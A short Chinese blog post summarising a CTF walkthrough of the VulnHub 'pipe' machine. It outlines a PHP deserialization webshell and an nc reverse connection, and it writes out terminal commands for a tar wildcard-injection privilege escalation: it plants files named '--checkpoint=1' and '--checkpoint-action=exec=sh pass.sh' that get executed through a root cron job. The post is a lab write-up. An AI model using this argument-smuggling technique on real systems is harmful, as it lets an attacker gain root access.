国外大牛的CTF通关攻略

 

 

https://highon.coffee/blog/pipe-ctf-walkthrough/

 

wget -c https://download.vulnhub.com/devrandom/pipe.ova

 

发现PHP序列化,结合后台日志文件代码泄漏,

利用代码中的file_put_contents写入一句话木马

nc反弹连接

 

上传linux_system_enum.sh搜集主机信息,

发现了crontab中root每隔五分钟执行一次,存在tar czf backup.tar.gz *

星号存在问题,设法在该目录构造参数化的文件名,利用

[jason@kali2017:/tmp/t]$ echo > --checkpoint=1
[jason@kali2017:/tmp/t]$ echo >--checkpoint-action=exec=sh\ pass.sh
[jason@kali2017:/tmp/t]$ echo 'echo > /home/jason/xxxxxxx.ok' > pass.sh
[jason@kali2017:/tmp/t]$ vim pass.sh
[jason@kali2017:/tmp/t]$ tar zcf z.tar.gz *          --------------利用了crontab中的这一句话
[jason@kali2017:/tmp/t]$ ls
--checkpoint=1  --checkpoint-action=exec=sh pass.sh  Cknife.db  Config.ini  pass.sh  x  x.tar.gz  z.tar.gz
[jason@kali2017:/tmp/t]$ ls /home/jason/
a        Documents  GitHack              Music     Public     Videos          vshare
Desktop  Downloads  linux-local-enum.sh  Pictures  Templates  VirtualBox VMs  xxxxxxx.ok

posted @ 2017-08-20 02:11  Jason571  阅读(1182)  评论(0)    收藏  举报